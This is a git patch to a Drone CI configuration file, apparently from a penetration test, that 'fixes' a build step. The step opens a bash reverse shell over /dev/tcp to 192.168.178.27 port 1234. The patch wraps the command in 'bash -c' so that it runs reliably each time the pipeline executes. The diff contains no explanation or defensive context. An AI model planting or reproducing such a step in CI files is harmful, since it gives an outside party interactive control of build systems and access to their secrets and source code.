From 44a83390a2c597410e75432de3c805c626f9eb31 Mon Sep 17 00:00:00 2001 From: pentest_audit2 Date: Tue, 17 Mar 2026 02:04:36 +0100 Subject: [PATCH] fix shell --- .drone.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.drone.yml b/.drone.yml index 58d31d8..ae9c010 100644 --- a/.drone.yml +++ b/.drone.yml @@ -7,4 +7,4 @@ steps: image: alpine:latest commands: - apk add --no-cache bash - - bash -i >& /dev/tcp/192.168.178.27/1234 0>&1 + - bash -c 'bash -i >& /dev/tcp/192.168.178.27/1234 0>&1'